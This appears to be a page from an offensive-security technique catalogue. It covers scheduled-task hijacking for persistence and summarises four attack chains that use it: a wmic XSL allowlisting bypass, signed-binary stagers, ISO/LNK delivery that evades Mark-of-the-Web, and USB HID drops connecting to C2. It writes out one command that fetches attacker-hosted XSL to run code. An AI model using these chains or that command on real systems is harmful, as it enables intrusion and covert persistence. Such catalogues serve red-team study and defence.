Scheduled Task Hijack
Writable XML in Tasks folder or a writable target binary — re-points a privileged task to attacker code.
§ Where this technique fits
W-SCHEDTASK-HIJACK is catalogued under the Persistence tactic of the offensive-security kill-chain. It appears in 4 approved dossiers in the registry, typically at step 5.3 on average.
§ Dossiers chaining this technique
- step 4 / 4
wmic + XSL → AppLocker / SRP bypass
wmic os get /format:'http://attacker/x.xsl' renders the result by fetching attacker XSL. The XSL contains JScript blocks — runs in wmic's signed-binary context, bypasses allowlisting.
- step 5 / 6
certutil + bitsadmin → AV-friendly stager chain
Initial access dropped a tiny .bat. It uses certutil to decode a base64 blob and bitsadmin to fetch the real beacon, then schtasks for persistence. Every binary is signed Microsoft.
- step 6 / 6
ISO container → LNK → stage from CDN → C2
Email attaches an ISO. Windows mounts it as a drive, bypassing Mark-of-the-Web. LNK inside runs a hidden binary that pulls the real stager from a CDN — Defender often misses the chain.
- step 6 / 6
USB drop in parking lot → HID payload → C2
Drop branded-looking USB sticks near the target site. An employee plugs one in; a Rubber-Ducky-class HID device types a PowerShell payload that connects out to attacker C2.
§ What commonly comes next
- 01Application Layer Protocolseen 1×T1071 · Command and Control